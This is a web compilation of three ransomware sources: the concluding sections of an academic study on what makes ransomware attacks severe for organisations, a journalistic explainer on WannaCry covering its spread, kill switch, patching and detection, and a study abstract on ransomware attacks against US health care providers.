Clearly, such extravagant amounts would have a more severe effect on an organization than, e.g. the typical £300–500 ransom. In our own sample, one small IT company (VirtOrgD) was asked to pay 75 bitcoins (approximate value £352 000 at the time of the attack), a ransom amount the victim could not afford to pay. After intense negotiations, hackers agreed to reduce the ransom amount to 65 bitcoins, but it was still too high for VirtOrgD. The victim had no choice but to recover from partial backups. In the first stages of recovery the management was not sure if the business was going to survive this attack as the VirtOrgD was rapidly losing its customer base. Through tremendous efforts of staff and with the help of external specialists, VirtOrgD managed to restore its business, although, inevitably, some substantial losses occurred. Similarly, another company (ITOrgJL) was asked to pay 100 bitcoins (approximate value of £470 000 at the time of the attack). ITOrgJL was able to negotiate the ransom down to 15 bitcoins and effectively recovered with a decryption key provided by hackers.

Both organizations VirtOrgD and ITOrgJL had weak security postures, which allowed hackers not only to penetrate their networks but also stay undetected for several days searching for loopholes to spread within the network and encrypt multiple devices, including servers that contained crucial data and systems. This confirms our observation that the majority of targeted attacks were executed against organizations that had weak security posture. The lethality of targeted attacks lies within hackers’ ability to execute network reconnaissance in order to find the most critical company’s assets (e.g. backup server, customer data, etc.) and security weaknesses that will allow to hijack these assets. It is up to organizations to take appropriate measures to avoid such dramatic consequences.

Our research findings demonstrate that several factors, including ‘organization sector’, ‘security posture’ and ‘attack type’, influence the degree of severity of ransomware attacks. More specifically, within our sample, private organizations were more likely to experience severe consequences compared to public ones. Interestingly, public organizations investigated in this study had considerably stronger security postures than those in the private sector. Private organizations typically operate to generate profit and any interruptions to services can cause grave damage to them. Public organizations, on the contrary, are funded by the government to serve the public. Subsequently, financial implications are not always relevant to them. We assert that private organizations need to recognize this vulnerability and ‘up their game’ in the security realm.

Furthermore, organizations that had weak security postures suffered harsher outcomes of ransomware attacks as opposed to companies with stronger postures. This finding indicates that the need to strengthen security postures in a bid to defend organizational assets against ransomware attacks is greater than ever. Hackers are relentlessly taking advantage of well-documented issues (e.g. RDP brute-force, poor security training, insufficient vulnerability management). It is important to note that organizations must focus on technical and non-technical controls as both are vital; one without the other is futile. As our results demonstrate, targeted attacks are mainly preying on technical shortcomings but even if all technical loopholes are closed down, hackers can still hit a potential victim by exploiting human weaknesses.

Moreover, targeted attacks brought more devastation to affected organizations in our sample compared to those who were hit opportunistically. Offenders normally invest more effort into targeted attacks and hence, expect higher yields. For example, a thorough investigation of the target may take place, so the hackers can understand how profitable the business is, what information is critical to its continuity and how much the victim can potentially afford to pay. Whether or not the victim pays, they are still going to suffer substantially. In a scenario where they pay, the ransom is going to be very high and the organization is going to experience considerable financial losses. In a situation where the victim does not pay, they are going to suffer not only financially (in many cases, recovery is more expensive than the ransom payment), but also experience significant disruptions to business operations. Therefore, it is worth making cybersecurity investments rather than face consequences of the targeted ransomware attacks. As our findings suggest, organizations with stronger security postures are less vulnerable to targeted attacks.

Our results also indicate that ‘organization size’, ‘crypto-ransomware propagation class’ and ‘attack target’ have no significant impact on the severity level of ransomware attacks. Within our sample, organizations of all sizes were afflicted by ransomware attacks, with consequences ranging from less severe (e.g. relatively short business continuity disruption timeline and insignificant information loss) to highly severe, where organizations faced a challenging recovery and, in many cases, came very close to business bankruptcy. In fact, one organization in our sample (SecOrgM) did not survive the ransomware attack. This finding underlines the indiscriminate nature of ransomware and serves as caution against common but dangerous attitudes such as ‘hackers could not possibly gain anything from attacking us – we are too small’, ‘we do not hold any state secrets or any other sensitive information that would be of interest to hackers’, ‘hackers are normally after banks as this is where the money is’, etc.

Since 2013, ransomware has evolved considerably and become much more technically advanced and dangerous. Generation III is substantially more of a menace than Generation II because of its greater degree of contagiousness and ability to self-propagate across infected networks. However, we found that the propagation class of crypto-ransomware by itself had no effect on the severity of crypto-ransomware attacks in the observed sample. Regarding the attack target (i.e. machine vs. human), crypto-ransomware equally impacts victims despite the network access method.

As ransomware attacks continue to hurt businesses around the globe, our results convey several important messages. First, we urge organizations of all sizes, small, medium and large, to strengthen their security posture. Secondly, we specifically stress that the vulnerabilities of private companies to ransomware attacks must be realized and addressed. Offenders are aware of their dependency on data and systems and take advantage of it. Thirdly, we conclude that the strength of ransomware is not in its technical capabilities and rapid evolution; rather, it lies within relentlessness of hackers who are persistently searching for a range of weaknesses within organizations. Security holes are widely exploited by perpetrators, but hackers also understand the sentimental value organizations may have to their owners who possibly spent a lifetime building their business (e.g. LogOrgD case). Criminals exploit the sense of responsibility that IT and Cyber Security professionals may experience if a company is significantly suffering from an attack (e.g. LawEnfM), or the responsibility management may feel because their staff is facing very challenging working conditions during attacks and potential harsh consequences post-attacks (e.g. EducInstFB). All of these factors inevitably make ransomware attacks ever so painful, while hackers are persistently doing their homework on potential victims; and this is why targeted attacks hit even harder.

This work makes a number of valuable contributions to the existing body of academic literature on ransomware. It increases knowledge about factors that can make crypto-ransomware attacks absolutely unbearable for affected organizations. We urge readers to learn from the experiences of victims presented in this work and take appropriate preventative actions to avoid, transfer or mitigate the risks of a crypto-ransomware attack. The article also introduces (see ‘Crypto-ransomware propagation class’ section) a simple but useful set of terms that can be used by various parties (e.g. academics, industry professionals, government bodies, etc.) to refer to different classes of this threat according to the degree of infectiousness, i.e. ‘Generation I’, ‘Generation II’, etc. Finally, we developed an Impact Assessment Instrument, which can be applied in further academic works that specifically focus on the crypto-ransomware impact.

This study has a number of limitations. As always, studying cybercrime is a challenge because researchers are faced with incomplete data, skewed surveys and questionable assumptions. The majority of our respondents were based in one country (the UK). Our sample size of 55, though respectable, is still quite small. Therefore, statistically speaking, the findings cannot be generalized outside the given sample and are only applicable within the observed 55 ransomware attacks. A logical follow-on would be to test our conclusions against a larger, more international data set – but a practical problem is how to readily obtain such data. Typically, ransomware victims do not disclose the full reality of their experiences in official complaints or incident reports [ 3 ]. Insurance companies such as Advisen have databases of incidents, but these only include organizations that were insured against cyberattacks and made claims. Unfortunately, these sorts of sampling and access issues are typical in cybersecurity research [ 25 ] and, as we earlier saw in Table 1 , it greatly complicates comparability between studies. We executed our study as rigorously as we could, combining quantitative and qualitative data, and although we believe it is robust and broadly generalizable, that is a point of conjecture.

Furthermore, in terms of limitations, in Phase 1, we interviewed one participant per organization. This is a very common limitation in qualitative data collection, where the principal interviewee typically plays the role of a ‘gatekeeper’, especially when the subject matter pertains to highly sensitive and confidential matters within the organization. We used a snowballing sampling strategy in Phase 2 of data collection which, though not ideal, was the only pragmatic way we could collect data on ransomware attacks.

As regard future research, in the next step we are planning to learn what makes ransomware so effective in a wider cybercrime eco-system. While in this study we assessed factors that make these attacks impactful, ransomware is a very complex threat and organized criminals employ various tactics to make these attacks successful. Therefore, we intend to learn about numerous vulnerabilities that cybercriminals prey on (whether technical, social or psychological), specifically focusing on victims’ decision-making processes regarding ransom payments. The ultimate purpose of this study will be to identify a series of measures that could potentially reduce ransom payments.

We would like to extend our sincere gratitude to all study participants for their invaluable contribution to this research. We greatly appreciate interviewees’ time and genuine effort. We realize some questions may have brought back emotions experienced by victims during attacks; we would like to thank you for your bravery and willingness to tell your story. It is very important that other organizations learn from your experiences. Special thanks to Robert McArdle, the Director of Cybercrime Research Team at Trend Micro, who provided expert advice on technical measures against crypto-ransomware attacks. We would like to acknowledge the relentless commitment of police officers from UK Regional Cybercrime Units in providing data and advising on study results. Please note that the views expressed in this work are ours alone and do not necessarily reflect those of the participants, the commentators or the funding body.

This work was supported by the Engineering and Physical Sciences Research Council [EP/P011721/1].

Europol. Internet Organised Crime Threat Assessment , 2020 .   https://www.europol.europa.eu/sites/default/files/documents/internet_organised_crime_threat_assessment_iocta_2020.pdf

Sophos . The State of Ransomware 2020: Results of an independent survey across 26 countries , 2020 . https://www.sophos.com/en-us/medialibrary/Gated-Assets/white-papers/sophos-the-state-of-ransomware-2020-wp.pdf

FBI . 2019 Internet Crime Report , 2020 . https://pdf.ic3.gov/2019_IC3Report.pdf [Accessed January 2020]

UK Government . Cyber Security Breaches Survey 2020 , 2020 . https://www.gov.uk/government/publications/cyber-security-breaches-survey-2020/cyber-security-breaches-survey-2020

Simoiu C , Gates C , Bonneau J , et al.  “I was told to buy a software or lose my computer. I ignored it”: A study of ransomware. In: Proceedings of USENIX Symposium on Usable Privacy and Security (SOUPS) , Santa Clara, CA, 11–13 August 2019 .

Connolly LY , Lang M , Gathegi J , et al.    Organisational culture, procedural countermeasures, and employee security behaviour: a qualitative study . Inf Comp Secur   2017 ; 25 : 118 – 36 .

Google Scholar

Richardson R , North M.   Ransomware: evolution, mitigation and prevention . Int Manage Rev   2017 ; 13 : 10 – 21 .

Connolly L , Wall SD.   The rise of crypto-ransomware in a changing cybercrime landscape: taxonomising countermeasures . Comput Secur   2019 ; 87 : 1 – 18 .

Holt T , Bossler A.   An assessment of the current state of cybercrime scholarship . Deviant Behav   2014 ; 35 : 20 – 40 .

Rege A. Incorporating the human element in anticipatory and dynamic cyber defense. In: Proceedings of the 2016 IEEE International Conference on Cybercrime and Computer Forensic , Vancouver, BC, 12–14 June 2016 , 1 – 7 .

Connolly L , Borrion H. Your money or your business: Decision-making processes in ransomware attacks. In: Proceedings of 2020 International Conference in Information Systems . Association for Information Systems, 14–16 December 2020 .

Payne BK , Hawkins B , Xin C.   Using labelling theory as a guide to examine the patterns, characteristics, and sanctions given to cybercrimes . Am J Crim Justice   2019 ; 44 : 230 – 47 .

Maimon D , Louderback E.   Cyber-dependent crimes: an interdisciplinary review . Annu Rev Criminol   2019 ; 2 : 191 – 216 .

Atapour-Abarghouei A , Bonner S , McGough AS. Volenti non fit injuria: ransomware and its victims. In: 2019 IEEE International Conference on Big Data , IEEE, December 2019 , 4701 – 7 .

Choi KS , Scott TM , LeClair DP.   Ransomware against police: diagnosis of risk factors via application of cyber-routing activities theory . Int J Forensic Sci Pathol   2016 ; 4 : 253 – 8 .

Zhao JY , Kessler EG , Yu J , et al.    Impact of trauma hospital ransomware attack on surgical residency training . J Surg Res   2018 ; 232 : 389 – 97 .

Zhang-Kennedy L , Assal H , Rocheleau J , et al.  The aftermath of a crypto-ransomware attack at a large academic institution. In: Proceedings of the 27th USENIX Security Symposium . Baltimore, MD, 15–17 August 2018 , 1061 – 78 . ISBN 978-1-939133-04-5.

Hull G , John H , Arief B.   Ransomware deployment methods and analysis: views from a predictive model and human responses . Crime Science   2019 ; 8 : 2 – 22 .

Shinde R , Van der Veeken P , Van Schooten S , et al.  Ransomware: studying transfer and mitigation. In: Proceedings of the 2016 International Conference on Computing, Analytics and Security Trends (CAST) . Pune: IEEE, 19–21 December 2016 , 90 – 5 .

Ioanid A , Scarlat C , Militaru G.  The effect of cybercrime on Romanian SMEs in the context of wannacry ransomware attacks. In: Proceedings of the European Conference on Innovation and Entrepreneurship , Paris : Academic Conferences International Limited , 21–22 September 2017 , 307 – 13 .

Google Preview

Byrne D , Thorpe C.  Jigsaw: an investigation and countermeasure for ransomware attacks. In: Proceedings of the European Conference on Cyber Warfare and Security . Dublin : Academic Conferences International Limited , 29–30 June 2017 , 656 – 65 .

Riglietti G.   Cyber security talks: a content analysis of online discussions on ransomware . Cyber Secur   2017 ; 1 : 156 – 64 .

Agustina JR.   Understanding cyber victimization: digital architectures and the disinhibition effect . Int J Cyber Criminol   2015 ; 9 : 35 – 54 .

Ngo FT , Paternoster R.   Cybercrime victimization: an examination of Individual and situational level factors . Int J Cyber Criminol   2011 ; 5 : 773 – 93 .

Furnell S , Emm D , Papadaki M.   The challenge of measuring cyber-dependent crimes . Comput Fraud Secur   2015 ; 2015 : 5 – 12 .

Business Continuity Institute [BCI]. BCI Cyber Resilience Report . Business Continuity Institute, 2018 .

Beazley. Breach Briefing , 2019 . https://www.beazley.com/Documents/2019/beazley-breach-briefing-2019.pdf

Al-Rimy BAS , Maarof MA , Shaid SZM.   Ransomware threat success factors, taxonomy, and countermeasures: a survey and research directions . Comput Secur   2018 ; 74 : 144 – 66 .

Mansfield-Devine S.   Securing small and medium-size businesses . Network Secur   2016 ; 2016 : 14 – 20 .

Renaud K.   How smaller businesses struggle with security advice . Comput Fraud Secur   2016 ; 2016 : 10 – 18 .

Browne S , Lang M , Golden W. Linking threat avoidance and security adoption: a theoretical model for SMEs. BLED 2015 Proceedings , 2015 , 35. http://aisel.aisnet.org/bled2015/35

Smith R. Ransomware is indiscriminate – secure your systems now, Petri , June 7, 2017 . https://www.petri.com/ransomware-indiscriminate-secure-systems-now

Kurpjuhn T.   The SME security challenge . Comput Fraud Sec   2015 ; 2015 : 5 – 7 .

Bergmann MC , Dreißigacker D , Skarczinski B , et al.    Cyber-dependent crime victimization: the same risk for everyone?   Cyberpsychol Behav Soc Network   2018 ; 21 : 84 – 90 .

Parkinson S. Are public sector organisations more at risk from cyber-attacks on old computers?, The Conversation , 16 May 2017 . https://theconversation.com/are-public-sector-organisations-more-at-risk-from-cyber-attacks-on-old-computers-77802

NIST . Guide for Conducting Risk Assessments, Information Security, NIST Special Publication 800-30 . National Institute of Standards and Technology, Gaithersburg, MD, 2012 . https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-30r1.pdf

Connolly L , Lang M , Wall DS.   Information security behavior: a cross-cultural comparison of employees in Ireland and United States . Inf Syst Manage   2019 ; 36 : 306 – 22 .

Connolly L , Lang M , Tygar JD.  Employee security behaviour: the importance of education and policies in organisational settings. In: Paspallis N , Raspopulos M , Barry C , et al.  (eds.), Advances in Information Systems Development Methods, Tools and Management. Lecture Notes in Information Systems and Organisation . Springer : New York , 2018 : 79 – 96 .

Brewer R.   Ransomware attacks: detection, prevention and cure . Network Secur   2016 ; 2016 : 5 – 9 .

Connolly L , Wall SD. Hackers are making personalised ransomware to target the most profitable and vulnerable, The Conversation , 2019 . https://theconversation.com/hackers-are-making-personalised-ransomware-to-target-the-most-profitable-and-vulnerable-113583

Williams M. 10 disturbing facts about employees and cyber security, Pensar , 13 December 2018 . https://www.pensar.co.uk/blog/infographic-10-disturbing-facts-about-employees-and-cyber-security

Browne S , Lang M , Golden W. The insider threat - understanding the aberrant thinking of the rogue ‘Trusted Agent’. In: Proceedings of European Conference on Information Systems , Münster, Germany, 26–29 May 2015 .

Creswell JW , Plano Clark VL.   Designing and Conducting Mixed Methods Research , 2nd edn. Thousand Oaks, CA : Sage Publications , 2011 .

Eisenhardt KM.   Building theories from case study research . Acad Manage Rev   1989 ; 14 : 532 – 50 .

Zumbo BD , Gadermann AM , Zeisser C.   Ordinal versions of coefficients alpha and theta for Likert rating scales . J Mod Appl Stat Meth   2007 ; 6 : 21 – 9 .

Eurostat . Your key European statistics, Eurostat , 2020 . https://ec.europa.eu/eurostat/web/structural-business-statistics/structural-business-statistics/sme

Porcedda MG , Wall DS.  Cascade and chain effects in big data cybercrime: lessons from the TalkTalk hack. In: Proceedings of WACCO 2019: 1st Workshop on Attackers and Cyber-Crime Operations , IEEE EuroS&P 2019, Stockholm , 20 June 2019 .

48. UK Government . Procurement Policy Note 09/14: Cyber Essentials Scheme Certification , 2014 . https://www.gov.uk/government/publications/procurement-policy-note-0914-cyber-essentials-scheme-certification

UK National Cyber Security Centre: Certificate Search . https://www.ncsc.gov.uk/cyberessentials/search

Eurostat, 2020b . https://ec.europa.eu/eurostat/tgm/table.do? tab=table&init=1&language=en&pcode=tin00170&plugin=1

Chapman J , Chinnaswamy A , Garcia-Perez A. The severity of cyber attacks on education and research institutions: a function of their security posture. In: Proceedings of ICCWS 2018 13th International Conference on Cyber Warfare and Security . Academic Conferences and Publishing Limited, 2018 , 111 – 9 .

ISO. ISO Survey, 2019 . https://www.iso.org/the-iso-survey.html

Email alerts

Citing articles via, affiliations.

• Online ISSN 2057-2093
• Print ISSN 2057-2085
• Copyright © 2024 Oxford University Press
• About Oxford Academic
• Publish journals with us
• University press partners
• What we publish
• New features  
• Open access
• Institutional account management
• Rights and permissions
• Get help with access
• Accessibility
• Advertising
• Media enquiries
• Oxford University Press
• Oxford Languages
• University of Oxford

Oxford University Press is a department of the University of Oxford. It furthers the University's objective of excellence in research, scholarship, and education by publishing worldwide

• Copyright © 2024 Oxford University Press
• Cookie settings
• Cookie policy
• Privacy policy
• Legal notice

This Feature Is Available To Subscribers Only

Sign In or Create an Account

This PDF is available to Subscribers Only

For full access to this pdf, sign in to an existing account, or purchase an annual subscription.

• Artificial Intelligence
• Generative AI
• Business Operations
• IT Leadership
• Application Security
• Business Continuity
• Cloud Security
• Critical Infrastructure
• Identity and Access Management
• Network Security
• Physical Security
• Risk Management
• Security Infrastructure
• Vulnerabilities
• Software Development
• Enterprise Buyer’s Guides
• United States
• United Kingdom
• Newsletters
• Foundry Careers
• Terms of Service
• Privacy Policy
• Cookie Policy
• Member Preferences
• About AdChoices
• E-commerce Links
• Your California Privacy Rights

Our Network

• Computerworld
• Network World

WannaCry explained: A perfect ransomware storm

Stolen government hacking tools, unpatched windows systems, and shadowy north korean operatives made wannacry a pernicious threat that continues to this day..

What is WannaCry?

WannaCry is a ransomware worm that spread rapidly through across a number of computer networks in May of 2017. After infecting a Windows computer, it encrypts files on the PC’s hard drive, making them impossible for users to access, then demands a ransom payment in bitcoin in order to decrypt them.

A number of factors made the initial spread of WannaCry particularly noteworthy: it struck a number of important and high-profile systems, including many in Britain’s National Health Service; it exploited a Windows vulnerability that was suspected to have been first discovered by the United States National Security Agency; and it was tentatively linked by Symantec and other security researchers to the Lazarus Group, a cybercrime organization that may be connected to the North Korean government.

How WannaCry works

The WannaCry ransomware executable works in a straightforward manner and is not considered particularly complex or innovative. It arrives on the infected computer in the form of a dropper, a self-contained program that extracts the other application components embedded within itself. Those components include: 

• An application that encrypts and decrypts data
• Files containing encryption keys
• A copy of Tor , used for command-and-control communications with the ransomware gang

Whatever the original WannaCry source code is, it hasn’t been found or made available to researchers, although it’s easy enough for them to examine the binary’s execution. Once launched, WannaCry tries to access a hard-coded URL—this is a kill switch, and we’ll discuss it in more detail in a moment. If the ransomware can connect to that URL, it shuts down; if it can’t, it proceeds to search for and encrypt files in a slew of important formats, ranging from Microsoft Office files to MP3s and MKVs, leaving them inaccessible to the user. It then displays a ransom notice, demanding some Bitcoin—not an outrageous amount, often on the order of $300—to decrypt the files.

How does WannaCry spread?

WannaCry spreads via a flaw in the Microsoft Windows implementation of the Server Message Block (SMB) protocol. The SMB protocol helps various nodes on a network communicate, and an unpatched version of Microsoft’s implementation could be tricked by specially crafted packets into executing arbitrary code , an exploit known as EternalBlue.

The fact that this rather pedestrian executable spread via EternalBlue is ultimately more interesting than the ransomware itself. It is believed that the U.S. National Security Agency discovered this vulnerability and, rather than reporting it to the infosec community, developed the EternalBlue code to exploit it . This exploit was in turn stolen by a hacking group known as the Shadow Brokers, who released it obfuscated in a seemingly political Medium post on April 8, 2017. Microsoft itself had discovered the vulnerability a month prior and had released a patch, but many systems remained unpatched and vulnerable, and WannaCry, aided by EternalBlue, began spreading rapidly on May 12. In the wake of the outbreak, Microsoft slammed the U.S. government for not having shared its knowledge of the vulnerability sooner .

WannaCry kill switch

The WannaCry kill switch is a piece of functionality that requires the executable to try to access the long, gibberish URL iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com before it begins the encryption process. Somewhat counterintuitively, WannaCry only proceeds with its ransomware mission if it fails to connect to the domain; if it can connect, it shuts itself down.

The purpose of this functionality is not entirely clear. Some researchers initially believed this was supposed to be a means for the malware’s creators to pull the plug on the attack. However, Marcus Hutchins, the British security researcher who discovered that WannaCry was attempting to contact this URL, believes it was meant to make analysis of the code more difficult . Many researchers will run malware in a “sandbox” environment, from within which any URL or IP address will appear reachable; by hard-coding into WannaCry an attempt to contact a nonsense URL that wasn’t actually expected to exist, its creators hoped to ensure that the malware wouldn’t go through its paces for researchers to watch.

Hutchins not only discovered the hard-coded URL but paid $10.96 to register the domain and set up a site there. Many instances of WannaCry never ended up encrypting the computers they infected as a result, and this helped blunt, though not stop, the spread of the malware.

Shortly after being hailed as a hero for this, Hutchins was arrested for helping develop different malware in 2014. He eventually pled guilty to related charges , and the judge in the case did not require him to serve jail time beyond his pretrial detention, saying that it was clear he had “turned a corner” in his life.

How to prevent WannaCry ransomware

WannaCry ransomware can be prevented by downloading the appropriate patch for your version of Windows from Microsoft, and the easiest way to do that is to simply update your OS to the most recent version. Ironically, the necessary patch was available before the attack began: Microsoft Security Bulletin MS17-010 , released on March 14, 2017, updated the Windows implementation of the SMB protocol to prevent infection via EternalBlue. Despite the fact that Microsoft had flagged the patch as critical, many systems were still unpatched as of May of 2017 when WannaCry began its rapid spread.

For those unpatched systems that are infected, there is little remedy beyond restoring files from a safe backup—so let that be a lesson that you should always back up your files. While those monitoring the bitcoin wallets identified in the extortion message say that some people are paying the ransom, there’s little evidence that they’re regaining access to their files . 

How to detect WannaCry

WannaCry can be detected by taking a close look at your system logs and network traffic. Because WannaCry won’t activate if it can contact the “kill switch” URL, it can lurk on your infrastructure without necessarily encrypting your files, so if you have unpatched Windows machines it’s a good idea to try to sniff it out before a change in circumstances causes it to become active.

SolarWinds has a good primer on using your server logs to detect WannaCry’s activities. They advise that you look for file creation—specifically for encrypting files with WannaCry’s own document extension, and to keep an eye out for outbound traffic for SMBv1 ports TCP 445 and 139, as well as DNS queries for the kill switch domain. Positive Technologies says you should also be looking for connections to the Tor network on ports 9001 and 9003.

WannaCry and Windows 10

As noted, Microsoft released a patch for the SMB vulnerability that WannaCry exploits two months before the attack began. While unpatched Windows 10 systems were vulnerable, the automatic update feature built into the OS meant that almost all Windows 10 systems were protected by May of 2017 .

The Microsoft SMB patch was initially only available for currently supported versions of Windows, which notably excluded Windows XP. There are still millions of internet-connected Windows XP systems out there—including at Britain’s National Health Service , where many WannaCry attacks were reported—and Microsoft eventually made the SMB patch available for older versions of the OS as well. However, a later analysis found that the vast majority of WannaCry infections struck machines running Windows 7 , an operating system still supported when WannaCry was at its peak.

Who created WannaCry?

The security firm Symantec believed that the code behind this malware might have a North Korean origin . They fingered the Lazarus Group as the culprits behind WannaCry, a hacking group that has been tied to North Korea. Beginning their run in 2009 with crude DDoS attacks on South Korean government computers, they’ve become increasingly sophisticated, hacking Sony and pulling off bank heists .

Symantec made this identification in a blog post in late May of 2017 , just a few weeks after WannaCry began its rapid spread. In December of 2017, Tom Bossert, who at the time was the U.S. National Security Advisor, wrote an op-ed in the Wall Street Journal in which he said that the U.S. government agreed with this assessment.

How did WannaCry start?

WannaCry exploded across the internet on May 12, 2017, taking advantage of EternalBlue, but Symantec’s initial blog post on WannaCry’s origins also revealed some important and little-known information about how the malware got started even before that. WannaCry had in fact been circulating for months before it became impossible to avoid. This earlier version of the malware was dubbed Ransom.Wannacry, and Symantec noted “substantial commonalities in the tools, techniques and infrastructure used by the attackers” between this version of WannaCry and those used by the Lazarus Group, which is how Symantec pinned the attack on the North Koreans.

However, Ransom.Wannacry used stolen credentials to launch targeted attacks rather than EternalBlue, which meant that its spread was much less virulent and dramatic. It’s assumed that the Lazarus Group directed the shift to EternalBlue as a distribution mechanism, but

Does WannaCry still exist?

WannaCry still exists and still continues to spread and infect computers, which on the surface may come as a surprise. After all, while the EternalBlue exploit is a powerful one, it only works on Windows machines that haven’t received the appropriate patch, and that patch is available for free to all Windows users (even Windows XP users!) and has been for years. But IT pros know that far too many shops don’t properly keep up with patching, either due to lack of resources, lack of planning, or fear that updating an existing system will cause downtime or interfere with crucial running software.

Unfortunately, this is a recipe for chaos, and has resulted in wholly preventable WannaCry infections in the years since the malware first arrived on the scene. For instance, in March 2018, Boeing was hit with a suspected WannaCry attack. The company claimed it did little damage, however, affecting only a few production machines. Boeing was able to stop the attack and bring the affected systems back quickly, but a company of Boeing’s size and stature should’ve had adequate patches in place by that time.

As the years wore on, WannaCry remained a pernicious threat. A report in May of 2019—a full two years after the EternalBlue patch became available—found that 40% of healthcare organizations and 60% of manufacturers had experienced at least one WannaCry attack in the previous six months . This led Ben Seri, VP of research at Amris, to declare that WannaCry was “ still unmanageable .”

That trend still continues today. The ongoing COVID-19 pandemic has made health care providers a particularly tempting target for ransomware gangs, and a surge of WannaCry attacks began in early 2020. Check Point Research found that the number of organizations affected by WannaCry grew by 53% in 2021 . Some have asked how WannaCry was stopped; the answer is that, while patching slowed its spread, it hasn’t been stopped yet.

All EternalBlue-based malware exploits the same Windows vulnerability, so the fact that these attacks are ongoing suggests that plenty of unpatched Windows systems are still out there. It’s only a matter of time before an attacker finds them. Don’t let your infrastructure end up on their list.

Related content

Microsoft and nvidia: partnering to protect ai workloads in azure, why ot cybersecurity should be every ciso's concern, 6 it risk assessment frameworks compared, black hat: latest news and insights, from our editors straight to your inbox.

Josh Fruhlinger is a writer and editor who lives in Los Angeles.

More from this author

What is the cia triad a principled framework for defining infosec policies, crisc certification: exam, requirements, training, potential salary, tabletop exercise scenarios: 10 tips, 6 examples, what is swatting criminal harassment falsely involving armed police, ccsp certification: exam, cost, requirements, training, salary, certified ethical hacker (ceh): certification cost, training, and value, whitelisting explained: how it works and where it fits in a security program, download our password managers enterprise buyer’s guide, most popular authors.

• Gyana Swain

Show me more

Thousands of netsuite stores leak sensitive data due to access control misconfiguration.

MIT delivers database containing 700+ risks associated with AI

How leading CISOs build business-critical cyber cultures

CSO Executive Sessions: Guardians of the Games - How to keep the Olympics and other major events cyber safe

CSO Executive Session India with Dr Susil Kumar Meher, Head Health IT, AIIMS (New Delhi)

CSO Executive Session India with Charanjit Bhatia, Head of Cybersecurity, COE, Bata Brands

Cybersecurity Insights for Tech Leaders: Addressing Dynamic Threats and AI Risks with Resilience

An official website of the United States government

The .gov means it’s official. Federal government websites often end in .gov or .mil. Before sharing sensitive information, make sure you’re on a federal government site.

The site is secure. The https:// ensures that you are connecting to the official website and that any information you provide is encrypted and transmitted securely.

• Publications
• Account settings

Preview improvements coming to the PMC website in October 2024. Learn More or Try it out now .

• Advanced Search
• Journal List
• JAMA Network

Trends in Ransomware Attacks on US Hospitals, Clinics, and Other Health Care Delivery Organizations, 2016-2021

Hannah t. neprash.

1 University of Minnesota, School of Public Health, Minneapolis, Minnesota

Claire C. McGlave

Dori a. cross, beth a. virnig.

2 University of Florida, College of Public Health and Health Professions, Gainesville, Florida

Michael A. Puskarich

3 University of Minnesota, Medical School, Minneapolis, Minnesota

Jared D. Huling

Alan z. rozenshtein.

4 University of Minnesota, Law School, Minneapolis, Minnesota

Sayeh S. Nikpay

Accepted for Publication: November 1, 2022.

Published: December 29, 2022. doi:10.1001/jamahealthforum.2022.4873

Open Access: This is an open access article distributed under the terms of the CC-BY License . © 2022 Neprash HT et al. JAMA Health Forum .

Author Contributions: Dr Neprash had full access to all of the data in the study and takes responsibility for the integrity of the data and the accuracy of the data analysis.

Concept and design: Neprash, McGlave, Huling, Rozenshtein, Nikpay.

Acquisition, analysis, or interpretation of data: Neprash, McGlave, Cross, Virnig, Puskarich.

Drafting of the manuscript: Neprash, Nikpay.

Critical revision of the manuscript for important intellectual content: All authors.

Statistical analysis: Neprash, McGlave, Huling.

Administrative, technical, or material support: McGlave, Rozenshtein, Nikpay.

Supervision: Neprash, Nikpay.

Other - methodological input: Cross.

Conflict of Interest Disclosures: None reported.

Additional Contributions: Ash Brizuela, BA, Benjamin Weideman, BA, Dana Varughese, BS, and Yazeed Abdelhay, BS (University of Minnesota), served as paid research assistants who assisted in the creation of the Tracking Healthcare Ransomware Events and Traits database under the supervision of Dr Neprash.

Associated Data

eTable 1. Data Sources and Methodology for Ransomware Attack Characteristics

eTable 2. Search Terms for Ransomware Attack Characteristics

eTable 3. Ransomware Attack Count, by Category of Information

eTable 4. Count of Attacks for which Each Source Provided Information

eTable 5. Change (Presented as Odds Ratios and Incident Rate Ratios) in Characteristics of Ransomware Attacks, from 2016 to 2021

How frequently do health care delivery organizations experience ransomware attacks, and how have the characteristics of ransomware attacks changed over time?

In this cohort study of 374 ransomware attacks, the annual number of ransomware attacks on health care delivery organizations more than doubled from 2016 to 2021, exposing the personal health information of nearly 42 million patients. During the study period, ransomware attacks exposed larger quantities of personal health information and grew more likely to affect large organizations with multiple facilities.

The study results suggest that ransomware attacks on health care delivery organizations are increasing in frequency and sophistication; disruptions to care during ransomware attacks may threaten patient safety and outcomes.

Anecdotal evidence suggests that health care delivery organizations face a growing threat from ransomware attacks that are designed to disrupt care delivery and may consequently threaten patient outcomes.

To quantify the frequency and characteristics of ransomware attacks on health care delivery organizations.

Design, Setting, and Participants

This cohort study used data from the Tracking Healthcare Ransomware Events and Traits database to examine the number and characteristics of ransomware attacks on health care delivery organizations from 2016 to 2021. Logistic and negative binomial regression quantified changes over time in the characteristics of ransomware attacks that affected health care delivery organizations.

Main Outcomes and Measures

Date of ransomware attack, public reporting of ransomware attacks, personal health information (PHI) exposure, status of encrypted/stolen data following the attack, type of health care delivery organization affected, and operational disruption during the ransomware attack.

From January 2016 to December 2021, 374 ransomware attacks on US health care delivery organizations exposed the PHI of nearly 42 million patients. From 2016 to 2021, the annual number of ransomware attacks more than doubled from 43 to 91. Almost half (166 [44.4%]) of ransomware attacks disrupted the delivery of health care, with common disruptions including electronic system downtime (156 [41.7%]), cancellations of scheduled care (38 [10.2%]), and ambulance diversion (16 [4.3%]). From 2016 to 2021, ransomware attacks on health care delivery organizations increasingly affected large organizations with multiple facilities (annual marginal effect [ME], 0.08; 95% CI, 0.05-0.10; P  < .001), exposed the PHI of more patients (ME, 66 385.8; 95% CI, 3400.5-129 371.2; P  = .04), were less likely to be restored from data backups (ME, −0.04; 95% CI, −0.06 to −0.01; P  = .002), were more likely to exceed mandatory reporting timelines (ME, 0.06; 95% CI, 0.03-0.08; P  < .001), and increasingly were associated with delays or cancellations of scheduled care (ME, 0.02; 95% CI, 0-0.05; P  = .02).

Conclusions and Relevance

This cohort study of ransomware attacks documented growth in their frequency and sophistication. Ransomware attacks disrupt care delivery and jeopardize information integrity. Current monitoring/reporting efforts provide limited information and could be expanded to potentially yield a more complete view of how this growing form of cybercrime affects the delivery of health care.

